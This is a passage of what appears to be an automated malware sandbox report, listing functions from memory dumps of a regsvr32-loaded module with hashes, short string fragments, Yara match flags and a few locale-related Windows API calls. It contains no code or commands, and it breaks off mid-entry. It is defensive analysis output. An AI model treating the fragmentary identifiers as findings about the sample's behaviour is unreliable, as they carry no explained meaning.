                                                                    • API ID:
                                                                    • String ID: 95s$\`s
                                                                    • API String ID: 0-3495284040
                                                                    • Opcode ID: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
                                                                    • Instruction ID: 5af2ad2f129eee824c5b1b43ddda8a3f0e9306f12771263eefccbe9bdf0da5be
                                                                    • Opcode Fuzzy Hash: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
                                                                    • Instruction Fuzzy Hash: 1351D47011478A8BCB48DF28C896ADE3FA1FB58348F114618FC668B264C7B4E665CBC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 3*$qMu
                                                                    • API String ID: 0-4093015089
                                                                    • Opcode ID: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
                                                                    • Instruction ID: 306475205ddf6f42a3ecfe0a1797163739854d195c0d735865f936de0d0f8307
                                                                    • Opcode Fuzzy Hash: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
                                                                    • Instruction Fuzzy Hash: 445122B09147189BCB88CFA8E4CA9CDBBF1FF48354F609119F806A7255DB709984CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X$"n&E
                                                                    • API String ID: 0-1188898577
                                                                    • Opcode ID: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
                                                                    • Instruction ID: 5f040a851564d75eb680569e00f78a68740ad3a482e782991b4ea7036c242a73
                                                                    • Opcode Fuzzy Hash: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
                                                                    • Instruction Fuzzy Hash: 3851CEB190038E8FCB48DF68D8865DE7BB1FB48344F018A1DE866AB250D7B4D665CB94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Bw~$fy
                                                                    • API String ID: 0-1663007907
                                                                    • Opcode ID: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
                                                                    • Instruction ID: 54d1d0e0fa6abfe6c6c31828b0edda1727153ea8c56c584fcf89706de6b20d2b
                                                                    • Opcode Fuzzy Hash: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
                                                                    • Instruction Fuzzy Hash: FC51D2B090038A8FCB48CF64C88A5DE7FB1FB48348F51861DFC26AA250D3B4D664CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: /0$XyLe
                                                                    • API String ID: 0-3562702181
                                                                    • Opcode ID: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
                                                                    • Instruction ID: 167cd3e3c855d70dfa0c36df1993a56b415187eb75226b1b3cef09056e291559
                                                                    • Opcode Fuzzy Hash: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
                                                                    • Instruction Fuzzy Hash: 5751C2B090034E8FDB48DF68C49A5DE7FB0FB68398F20421DE856A6250D37496A4CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: >I$>I
                                                                    • API String ID: 0-3948471910
                                                                    • Opcode ID: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
                                                                    • Instruction ID: a225938552342fdcd3306cc52f41137c6a5b776406488479516cfafb05d577e3
                                                                    • Opcode Fuzzy Hash: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
                                                                    • Instruction Fuzzy Hash: 8D41F0B0909B849BC788DF68C18A90AFBE0FBD8704F505A1DF5858B660DBB4D806CF42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: {H2}$}i#c
                                                                    • API String ID: 0-1724349491
                                                                    • Opcode ID: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
                                                                    • Instruction ID: 37d5b784c44c013357b808598ceb46bd6ed98c7a9730d3ab63b6bf10ba55f6e5
                                                                    • Opcode Fuzzy Hash: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
                                                                    • Instruction Fuzzy Hash: 3941EAB190078A8BCF48CF68C89A1DE7BB1FB58358F11461DE866A6250D3B49664CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4V$so
                                                                    • API String ID: 0-1060102820
                                                                    • Opcode ID: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
                                                                    • Instruction ID: d444a7ea2620fcfa6eb466004a6e01db215641729881944e94261e2193751ac2
                                                                    • Opcode Fuzzy Hash: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
                                                                    • Instruction Fuzzy Hash: 8E41BEB180034A8FCB48CF64C88A5DE7FB1FB68398F104619E859A6250D3B4D6A5CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: F+'$O$
                                                                    • API String ID: 0-4064122715
                                                                    • Opcode ID: 2ce923b60eb562ae85959f621386450c4d7366c85186967bb9bba02107a4a539
                                                                    • Instruction ID: be1e2e71df6ebfdb4da32f29d75cc371dd40c0bd5c05f395d23934970efaee37
                                                                    • Opcode Fuzzy Hash: 2ce923b60eb562ae85959f621386450c4d7366c85186967bb9bba02107a4a539
                                                                    • Instruction Fuzzy Hash: FD41D6705187848BD3A9DF68C08965EFBF0FB96394F104A1CF68686670C7B6D849CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 1$bO6
                                                                    • API String ID: 0-3242911120
                                                                    • Opcode ID: 9f75d9841d56aa2cc22d310afbf4e4cd48e2e3da52340bc691d74cf5e049a536
                                                                    • Instruction ID: 6601c978ba2416544a7d1ca6fb5225a3b879728eb772ccf04003f68ee897128b
                                                                    • Opcode Fuzzy Hash: 9f75d9841d56aa2cc22d310afbf4e4cd48e2e3da52340bc691d74cf5e049a536
                                                                    • Instruction Fuzzy Hash: 8A3107701187449FC7A8DF68C086A5ABBF0FB9A354F50491DF686C7265C3B2D895CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )j-J$\rba
                                                                    • API String ID: 0-105394296
                                                                    • Opcode ID: b27fa7590f58ca7dd2d737508af6f5bc0d6ebd07140c48d4a736306249910364
                                                                    • Instruction ID: 842adb91478ed39572f9e8a80903ac0de563c5eb9e26d75e48c1d2cd82a83531
                                                                    • Opcode Fuzzy Hash: b27fa7590f58ca7dd2d737508af6f5bc0d6ebd07140c48d4a736306249910364
                                                                    • Instruction Fuzzy Hash: 1A31D17080024E8BDF88DF64D48A6DFBFF0FB58788F205219E856A6254D7749694CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 5T$7c
                                                                    • API String ID: 0-2666566123
                                                                    • Opcode ID: 2ae419eb0ff386ee94a2b0b54af6030ef829be62021f352e0c4a6905d27011e8
                                                                    • Instruction ID: ee04dda3efe5c9a307f88871a109fd0823ba75d09644cdd26569aa81abafae9d
                                                                    • Opcode Fuzzy Hash: 2ae419eb0ff386ee94a2b0b54af6030ef829be62021f352e0c4a6905d27011e8
                                                                    • Instruction Fuzzy Hash: 7631E2B051C7808BC358DF68D15A51BFBF1BBCA748F50891CF686866A0D7B6D818CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ",)x$PX
                                                                    • API String ID: 0-926260526
                                                                    • Opcode ID: f165c3a10a1fa821f16c68d8465b247d8270816cceff94c6b22525474e7640ac
                                                                    • Instruction ID: d5a1e783bdd82888163cb93820b1a52157f2f65bb265271905f807ea8b7abae1
                                                                    • Opcode Fuzzy Hash: f165c3a10a1fa821f16c68d8465b247d8270816cceff94c6b22525474e7640ac
                                                                    • Instruction Fuzzy Hash: DA31A1B091434E8FCB48DF64C88A5DE7FF0FB58398F114619E85AA6250D3B89694CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: 31e1571c4c9480ce99c15a91898bfef815e3c9c5a1e04a4fd1e61da97386d0dc
                                                                    • Instruction ID: 179045921a3e795d8b99b85ba89488ef4779379f00992c0d526fa5f223b84187
                                                                    • Opcode Fuzzy Hash: 31e1571c4c9480ce99c15a91898bfef815e3c9c5a1e04a4fd1e61da97386d0dc
                                                                    • Instruction Fuzzy Hash: 5D119B32E0858745EB709B64ECA13BD12F0FB44785F446031DE8DCAA91CE2CE7478718
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2099609381-0
                                                                    • Opcode ID: aeac2b72f960d353e04b1ec94d2b5deee2ea0aff83e9dab1063ee3790c567d86
                                                                    • Instruction ID: 8be5e7dce2cdbf42148020a6a26a2a5c3bbf5c7b2fe0784ffda55e219f6e3532
                                                                    • Opcode Fuzzy Hash: aeac2b72f960d353e04b1ec94d2b5deee2ea0aff83e9dab1063ee3790c567d86
                                                                    • Instruction Fuzzy Hash: 31115172E0860987FB28CB31CC2537D26F1FB54B1AF145435CA0D856E5CFBCD6958688
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • EnumSystemLocalesA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FFF21BB5A8C), ref: 00007FFF21BBC8FD
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2099609381-0
                                                                    • Opcode ID: 63a91a0b255d2a7e8e8559b933d18d41bbf72777b1d5725641a44dd385286e67
                                                                    • Instruction ID: a4f218c840971137fcd48afa83f43bcc3d9280c2c16020e2c4150fdb10a4c0e3
                                                                    • Opcode Fuzzy Hash: 63a91a0b255d2a7e8e8559b933d18d41bbf72777b1d5725641a44dd385286e67
                                                                    • Instruction Fuzzy Hash: 5CF08662E0850A46FB25CA31C8253BD22F1BB94B46F18A031CA4DC66A6CF6CD6928248
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale_getptd
                                                                    • String ID:
                                                                    • API String ID: 3731964398-0
                                                                    • Opcode ID: c55661bbe17e4b16f28eed47b7e85f9fabee07928079620ee3b979cc97ad5c67
                                                                    • Instruction ID: c1b75bab6d5b63e6ae1f8bd9bce4043226e68a01ea1558c356b36e1a0a59df95
                                                                    • Opcode Fuzzy Hash: c55661bbe17e4b16f28eed47b7e85f9fabee07928079620ee3b979cc97ad5c67
                                                                    • Instruction Fuzzy Hash: 29F05E22E186C083D7118B1AF44415EA7A1FBC8BE4F584221EA9E57BA9CE2CD956CB44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: 502a65142465a1b9b121244362b20e71b6ae70508435106b2b95459646a177ab
                                                                    • Instruction ID: da70b58c9e5302ec8dd9e575bb29f46f13582ca1f4e17608de492dfbb195381e
                                                                    • Opcode Fuzzy Hash: 502a65142465a1b9b121244362b20e71b6ae70508435106b2b95459646a177ab
                                                                    • Instruction Fuzzy Hash: DEE06525E0C58185F7309720EC613AE67F1FF98758F901231DA9D86AB5DE2CE3058B05
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2099609381-0
                                                                    • Opcode ID: a3acadd2f008454ed6638a5ec196b6424420b15def5e390d94227f08142a8bc9
                                                                    • Instruction ID: 62048a5ec4c9fcf47e1fd8a38b4c7099cd1fec1979acd244b1cc4ff31e26f939
                                                                    • Opcode Fuzzy Hash: a3acadd2f008454ed6638a5ec196b6424420b15def5e390d94227f08142a8bc9
                                                                    • Instruction Fuzzy Hash: 91E04F66E0560543EB18CB61D85437C62A1EB98B0AF089035CA0C851A58F7CC6968644
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: cYte
                                                                    • API String ID: 0-489798635
                                                                    • Opcode ID: 6004706ed1147b69530f76000c159dc057970e6c457d66b2cd8eae28b0101d69
                                                                    • Instruction ID: 4bcad34f3ef31740aa8133b8dde5a269bb367cd09133d205a83695970592d01c
                                                                    • Opcode Fuzzy Hash: 6004706ed1147b69530f76000c159dc057970e6c457d66b2cd8eae28b0101d69
                                                                    • Instruction Fuzzy Hash: C4B1E570904A0C9FCB99DFA8D4C96DDBFB1FB48354F908119F806AB294D774998ACF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Pc
                                                                    • API String ID: 0-2609325410
                                                                    • Opcode ID: 1a0088ecf8094bc96bd3fe6dd6dc82c472572739438acd9534c77a0a59272c42
                                                                    • Instruction ID: 12b923e2fd3f69615379d54222b7898fdcc3de1fee72b8e179f5c4c977b11f8e
                                                                    • Opcode Fuzzy Hash: 1a0088ecf8094bc96bd3fe6dd6dc82c472572739438acd9534c77a0a59272c42
                                                                    • Instruction Fuzzy Hash: 4CC188B6502749CFCB88DF68C69A59E7BF1FF55308F004129FC0A9A660D374D929CB48
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: xDC
                                                                    • API String ID: 0-90241050
                                                                    • Opcode ID: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
                                                                    • Instruction ID: 9121b1bc5c885adbeef7a29f5b0494aad7ac2618abc594bea640adf26706a648
                                                                    • Opcode Fuzzy Hash: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
                                                                    • Instruction Fuzzy Hash: F391387052065CEBDB99DF68C8CAADD3BA0FB48394F906219FC4287250C775D9C98B86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: g >
                                                                    • API String ID: 0-3862707646
                                                                    • Opcode ID: ed648581161f49faafb3551504090fa0bdf2ce44a31b7bcfa2a0e2750c151a25
                                                                    • Instruction ID: 455282f08292131e945dcc730a648b96f9dba3dd8fa54dedd401ba7ae830fef0
                                                                    • Opcode Fuzzy Hash: ed648581161f49faafb3551504090fa0bdf2ce44a31b7bcfa2a0e2750c151a25
                                                                    • Instruction Fuzzy Hash: DEA1E5B1604649CFCB98DF28C4896DE7BE0FF48358F41412AFD0A9B255C774DAA8CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 2
                                                                    • API String ID: 0-2012265552
                                                                    • Opcode ID: 4b072a5d04a01b9100fac41699cb466bc37952194d83653627602ebfe7fd88fa
                                                                    • Instruction ID: 4926f2c2e7b01a1509be6dde787c5073208d3019f4660081853cabf743aa6d2d
                                                                    • Opcode Fuzzy Hash: 4b072a5d04a01b9100fac41699cb466bc37952194d83653627602ebfe7fd88fa
                                                                    • Instruction Fuzzy Hash: 23A1467490660CDFCB69DFA8C0856CDBBF2FF18344F1081AAE816A7261D774C619CB89
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Wcl
                                                                    • API String ID: 0-2623992880
                                                                    • Opcode ID: f4aab810873131842688b8816ae552eda5867b61779d557f5a81b893f1e00e3f
                                                                    • Instruction ID: 6785441b261b06c1a3a09f49601167733b22bb672c53a20dcfeae34723d14519
                                                                    • Opcode Fuzzy Hash: f4aab810873131842688b8816ae552eda5867b61779d557f5a81b893f1e00e3f
                                                                    • Instruction Fuzzy Hash: DCB17BB990364DCFCB68CF78D58A59D7BF1AF64308F204119FC259A266D3B0D629CB48
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ws8
                                                                    • API String ID: 0-2196714860
                                                                    • Opcode ID: 5d33fb8a3b51542eaa6130f047a5a21fcb70befd8ff2f8c5da0624ee0b386558
                                                                    • Instruction ID: b480ef2199d1fafa288ff61c3bcffdce570952497d21d470c9db593eaacbee88
                                                                    • Opcode Fuzzy Hash: 5d33fb8a3b51542eaa6130f047a5a21fcb70befd8ff2f8c5da0624ee0b386558
                                                                    • Instruction Fuzzy Hash: 54711A70A0470E8FDB59DFA8C45AAEFBBF2FB54348F004119D806A7291DB749A19CBC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: p/g
                                                                    • API String ID: 0-1786412500
                                                                    • Opcode ID: ea109bfccebd437b4b01984c5c0f8ff51e1effdcf135339ee94665a9e60d530a
                                                                    • Instruction ID: ede728f5e2ba0833d242d52ca27ad93f20c36497480e8c5f25a004cbad49378e
                                                                    • Opcode Fuzzy Hash: ea109bfccebd437b4b01984c5c0f8ff51e1effdcf135339ee94665a9e60d530a
                                                                    • Instruction Fuzzy Hash: F58108B050434E8FCB88DF68D88A6DE7FF0FB58358F105659E85A96250D3B8D694CF84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %
                                                                    • API String ID: 0-3714942587
                                                                    • Opcode ID: 4a5e4fe18fa17051425459feb0137b81b0d343578dbe0cd5a85f108800ca0619
                                                                    • Instruction ID: d5d5bf94d11651037a836977de8f66422f038c9f5d7a5f915f0cc542ec650b78
